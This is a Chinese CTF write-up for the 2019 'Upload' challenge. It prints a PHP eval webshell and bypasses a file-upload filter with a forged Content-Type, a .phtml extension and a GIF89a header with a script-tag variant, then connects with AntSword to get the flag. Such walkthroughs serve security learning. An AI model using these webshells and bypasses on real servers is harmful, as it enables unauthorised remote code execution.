[极客大挑战 2019]Upload

举报
开心星人 发表于 2022/09/26 20:30:46 2022/09/26
【摘要】 evil.php<?php eval($_POST['evil'])?>可能是前端的验证或者是后端Content-type的校验。所以不仅仅是前端的校验。我们更改Content-Type为image/jpeg同时更改Content-type为image/jpeg和文件后缀名为jpg(这样可能不会以php解析,所以绕过了后缀名检验也是没有意义的)尝试将后缀名更改为php3、php4、php5、...

evil.php

<?php eval($_POST['evil'])?>

在这里插入图片描述

可能是前端的验证或者是后端Content-type的校验。
在这里插入图片描述
所以不仅仅是前端的校验。

我们更改Content-Type为image/jpeg
在这里插入图片描述

同时更改Content-type为image/jpeg和文件后缀名为jpg(这样可能不会以php解析,所以绕过了后缀名检验也是没有意义的)
在这里插入图片描述

尝试将后缀名更改为php3、php4、php5、phtml、pht
在这里插入图片描述

发现phtml可以绕过
在这里插入图片描述

更换一句话木马

GIF89a? <script language="php">eval($_POST['evil'])</script>

在这里插入图片描述
上传成功
访问/upload目录 (猜的,一般都是upload目录)

访问http://2d30c63d-d4db-41c3-9f02-91348f6274c7.node4.buuoj.cn:81/upload/
在这里插入图片描述
访问一下我们上传的文件
http://2d30c63d-d4db-41c3-9f02-91348f6274c7.node4.buuoj.cn:81/upload/evil.phtml
在这里插入图片描述
用antsword连接
在这里插入图片描述
根目录下发现flag

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。